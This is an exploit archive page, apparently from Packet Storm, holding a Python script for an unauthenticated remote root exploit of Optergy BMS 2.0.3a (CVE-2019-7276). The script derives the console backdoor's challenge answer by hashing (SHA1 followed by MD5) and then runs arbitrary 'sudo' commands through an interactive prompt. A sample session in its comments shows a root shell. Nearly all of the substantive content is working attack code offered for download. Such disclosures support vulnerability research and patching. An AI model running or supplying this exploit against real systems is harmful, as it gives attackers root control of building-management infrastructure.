what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Optergy BMS 2.0.3a Remote Root

Optergy BMS 2.0.3a Remote Root
Posted Nov 12, 2019
Authored by LiquidWorm | Site applied-risk.com

Optergy BMS versions 2.0.3a and below unauthenticated remote root exploit. Related CVE number: CVE-2019-7276.

tags | exploit, remote, root
SHA-256 | 3ae6aed4c1a394810759666372f4565230fd89fa117526162527acacc6654872

Optergy BMS 2.0.3a Remote Root

Change Mirror Download
#!/usr/bin/env python
#
# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)
#
# Affected version <=2.0.3a (Proton and Enterprise)
# Discovered by Gjoko 'LiquidWorm' Krstic
#
# CVE: CVE-2019-7276
# Advisory: https://applied-risk.com/resources/ar-2019-008
#
##############################################################################
#
# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19
# Challenge received: 1547540929287
# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93
# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31
# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
##############################################################################
#
#

import os#######
import sys######
import json#####
import hashlib##
import requests#

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
sys.exit()

while True:

challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'

try:
req1 = requests.get(challenge_url)
get_challenge = json.loads(req1.text)
challenge = get_challenge['response']['message']
print 'Challenge received: ' + challenge

hash_object = hashlib.sha1(challenge.encode())
print 'SHA1: '+(hash_object.hexdigest())
h1 = (hash_object.hexdigest())
hash_object = hashlib.md5(h1.encode())
print 'MD5 from SHA1: '+(hash_object.hexdigest())
h2 = (hash_object.hexdigest())
print 'Answer: '+h1+h2

zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'
zeCommand = raw_input('# ')
if zeCommand.strip() == 'exit':
sys.exit()
zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h',
'Accept' : '*/*',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'mk-MK,mk;q=1.7',
'Connection' : 'keep-alive',
'Connection-Type' : 'application/x-www-form-urlencoded'}
zePardata = {'command' : 'sudo '+zeCommand,
'challenge' : challenge,
'answer' : h1+h2}

zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
get_resp = json.loads(zeRequest.text)
get_answ = get_resp['response']['message']
print get_answ
except Exception:
print '[*] Error!'
break
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    16 Files
  • 7
    Oct 7th
    12 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close